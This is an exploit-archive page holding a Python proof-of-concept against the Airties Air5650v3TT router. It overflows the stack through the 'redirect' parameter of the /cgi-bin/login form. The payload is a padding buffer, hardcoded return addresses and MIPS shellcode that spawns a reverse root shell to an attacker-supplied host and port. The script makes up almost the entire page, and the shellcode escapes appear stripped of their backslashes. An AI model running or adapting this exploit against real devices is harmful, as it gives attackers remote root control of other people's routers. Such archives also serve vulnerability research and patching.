Home / exploits Airties Air5650v3TT Remote Stack Overflow
Posted on 04 April 2015
#!/usr/bin/env python ##################################################################################### # Exploit for the AIRTIES Air5650v3TT # Spawns a reverse root shell # Author: Batuhan Burakcin # Contact: batuhan@bmicrosystems.com # Twitter: @batuhanburakcin # Web: http://www.bmicrosystems.com ##################################################################################### import sys import time import string import socket, struct import urllib, urllib2, httplib if __name__ == '__main__': try: ip = sys.argv[1] revhost = sys.argv[2] revport = sys.argv[3] except: print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0] host = struct.unpack('>L',socket.inet_aton(revhost))[0] port = string.atoi(revport) shellcode = "" shellcode += "x24x0fxffxfax01xe0x78x27x21xe4xffxfdx21xe5xffxfd" shellcode += "x28x06xffxffx24x02x10x57x01x01x01x0cxafxa2xffxff" shellcode += "x8fxa4xffxffx34x0fxffxfdx01xe0x78x27xafxafxffxe0" shellcode += "x3cx0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] shellcode += "x35xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] shellcode += "xafxaexffxe4" shellcode += "x3cx0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1] shellcode += "x35xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3] shellcode += "xafxaexffxe6x27xa5xffxe2x24x0cxffxefx01x80x30x27" shellcode += "x24x02x10x4ax01x01x01x0cx24x11xffxfdx02x20x88x27" shellcode += "x8fxa4xffxffx02x20x28x21x24x02x0fxdfx01x01x01x0c" shellcode += "x24x10xffxffx22x31xffxffx16x30xffxfax28x06xffxff" shellcode += "x3cx0fx2fx2fx35xefx62x69xafxafxffxecx3cx0ex6ex2f" shellcode += "x35xcex73x68xafxaexffxf0xafxa0xffxf4x27xa4xffxec" shellcode += "xafxa4xffxf8xafxa0xffxfcx27xa5xffxf8x24x02x0fxab" shellcode += "x01x01x01x0c" data = "x41"*359 + "x2AxB1x19x18" + "x41"*40 + "x2AxB1x44x40" data += "x41"*12 + "x2AxB0xFCxD4" + "x41"*16 + "x2AxB0x7Ax2C" data += "x41"*28 + "x2AxB0x30xDC" + "x41"*240 + shellcode + "x27xE0xFFxFF"*48 pdata = { 'redirect' : data, 'self' : '1', 'user' : 'tanri', 'password' : 'ihtiyacmyok', 'gonder' : 'TAMAM' } login_data = urllib.urlencode(pdata) #print login_data url = 'http://%s/cgi-bin/login' % ip header = {} req = urllib2.Request(url, login_data, header) rsp = urllib2.urlopen(req)
